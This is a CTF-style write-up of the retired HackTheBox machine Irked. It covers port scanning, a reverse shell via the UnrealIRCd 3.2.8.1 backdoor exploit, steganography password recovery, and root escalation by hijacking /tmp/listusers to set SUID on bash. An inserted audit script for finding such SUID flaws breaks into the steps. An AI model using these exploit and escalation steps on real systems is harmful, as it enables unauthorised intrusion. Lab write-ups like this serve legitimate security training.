Thursday, 3 June 2021

HTB - Irked

Today we will break a retired, easy HTB machine called Irked.

You will learn basic enumeration and steganography.

DESCRIPTION

10.10.10.117 -  Linux - Easy


ENUMERATION

Port enumeration: 

-p-: scan all 65535 TCP ports
--open: show only open ports
-T5: fastest (insane) timing template, aggressive mode
-v: verbose output in the console
-n: don't apply name resolution
-oN: export results in normal nmap format

kali:~/htb-vip/irked$ nmap -p- --open -T5 -v -n 10.10.10.117 -oN irked.puertos
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
6697/tcp  open  ircs-u
8067/tcp  open  infi-async
52603/tcp open  unknown
65534/tcp open  unknown

Basic services enumeration:

@kali:~/htb-vip/irked$ nmap -sC -sV -p22,80,111,6697,8067,52603,65534 10.10.10.117 -oN irked.servicios
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          42496/udp6  status
|   100024  1          52603/tcp   status
|   100024  1          59968/udp   status
|_  100024  1          60754/tcp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
52603/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


FOOTHOLD

The UnrealIRCd service sounds interesting; let's check with searchsploit whether there is any known vulnerability that can be exploited:

@kali:~/htb-vip/irked$ searchsploit UnrealIRCd
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                      |  Path
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                                                                        | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                                                                             | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                                                                      | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                                                                           | windows/dos/27407.pl

Backdoor Command Execution sounds interesting, but as we want to get the OSCP, we are not going to use Metasploit.

Let's have a look at Google: UnrealIRCd 3.2.8.1 exploit github

First entry: Ranger11Danger UnrealIRCd-3.2.8.1-Backdoor

git clone https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor.git

We update exploit.py with our local IP and the port on which we will run our listener in order to catch the reverse shell:

local_ip = '10.10.14.5'  
local_port = '443'

Get a reverse shell:

kali# nc -nlvp 443
kali# python exploit.py -payload bash 10.10.10.117 6697


PIVOTING

We get a shell as the ircd user, but this user is not able to read the user.txt flag; only the djmardov user can, so let's enumerate a bit more:

djmardov enumeration:

ircd@irked$ ls -la /home/djmardov/* -R

Under djmardov's home directory we find an interesting hidden file containing a password:

/home/djmardov/Documents/.backup
cat /home/djmardov/Documents/.backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss


"steg" sounds like steganography, and the website shows an image: irked.jpg

Let's see whether the image is hiding something interesting:

alter@kali:~/htb-vip/irked$ steghide extract -sf irked.jpg 

It asks for a passphrase; let's provide the password we found in the previous step:

Anotar salvoconducto: 
UPupDOWNdownLRlrBAbaSSss

/htb-vip/irked$ cat pass.txt 

Kab6h+m+bbp2J:HG

Let's log in as the djmardov user:

ircd@irked$ su djmardov
password:Kab6h+m+bbp2J:HG
djmardov@irked:~/Documents$ cat user.txt 
4a66a78b12dc0e661a59d3f5c0267a8e

djmardov@irked:~/Documents$ 


PRIV ESCALATION

We will start with an automated tool just to get a quick overview; if we don't find anything interesting we will go ahead with a deeper manual enumeration.

So let's use lse.sh with level 1:
https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh



djmardov@irked:/dev/shm$ ./lse.sh -l 1
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/bin/X
/usr/bin/viewuser

In this case lse.sh returns an interesting file which we don't usually find on a Linux system.
If we have a look at viewuser with strings, we see it executes /tmp/listusers, so maybe we can take advantage of this to escalate to root:


djmardov@irked:/dev/shm$ strings /usr/bin/viewuser
WARNING: terminal is not fully functional
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setuid
puts
system
__cxa_finalize
__libc_start_main
GLIBC_2.0
GLIBC_2.1.3
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
UWVS
[^_]
This application is being devleoped to set and test user permissions
It is still being actively developed
/tmp/listusers
;*2$"
GCC: (Debian 7.2.0-8) 7.2.0


listusers is executed by viewuser, which runs as root due to the SUID bit.

So we can create /tmp/listusers so that it sets the SUID bit on /bin/bash; as bash is owned by root, that will give us access to a root shell:
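The underlying defect here is a SUID binary that executes a path under a world-writable directory. lse.sh only flags viewuser as an uncommon setuid binary; the following audit helper (an added example, not part of this write-up nor of lse.sh) goes one step further and reports any setuid file that embeds a path under /tmp, /var/tmp or /dev/shm, the pattern that made this escalation possible. It uses grep -a instead of strings so it runs on a minimal system; the directory list and the sample file are assumptions for illustration.

```shell
#!/bin/sh
# Audit helper: find setuid binaries that reference paths under
# world-writable directories (the viewuser -> /tmp/listusers pattern).

# Print every embedded path under /tmp, /var/tmp or /dev/shm found in FILE.
writable_dir_refs() {
    grep -aoE '/(tmp|var/tmp|dev/shm)/[A-Za-z0-9._/-]+' "$1" | sort -u
}

# Return 0 (true) if FILE references such a path, 1 otherwise.
has_writable_dir_ref() {
    [ -n "$(writable_dir_refs "$1")" ]
}

# Walk the filesystem (default: /) for setuid files and report suspicious ones.
# Pass a narrower directory such as /usr/bin to keep the scan fast.
audit_suid() {
    root="${1:-/}"
    find "$root" -xdev -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
        if has_writable_dir_ref "$f"; then
            printf '[!] %s references: %s\n' "$f" "$(writable_dir_refs "$f" | tr '\n' ' ')"
        fi
    done
}

# Constructed sample standing in for a binary like viewuser: its only
# interesting content is the offending path. Prints the temp file's name.
make_sample() {
    sample="$(mktemp)"
    printf 'junk setuid system /tmp/listusers more junk\n' > "$sample"
    printf '%s\n' "$sample"
}
```

Run `audit_suid /usr/bin` on the box and viewuser shows up with its /tmp/listusers reference; a clean system should print nothing.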

djmardov@irked:/tmp$ echo "chmod u+s /bin/bash" > listusers
djmardov@irked:/tmp$ chmod 755 listusers 
djmardov@irked:/tmp$ /usr/bin/viewuser   
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-06-03 12:54 (:0)
djmardov@irked:/tmp$ ls -l /bin/bash 
-rwsr-xr-x 1 root root 1105840 Nov  5  2016 /bin/bash
djmardov@irked:/tmp$ /bin/bash -p
bash-4.3# whoami 
root

bash-4.3# cat root.txt 
8d8e9e8be64654b6dccc3bff4522daf3

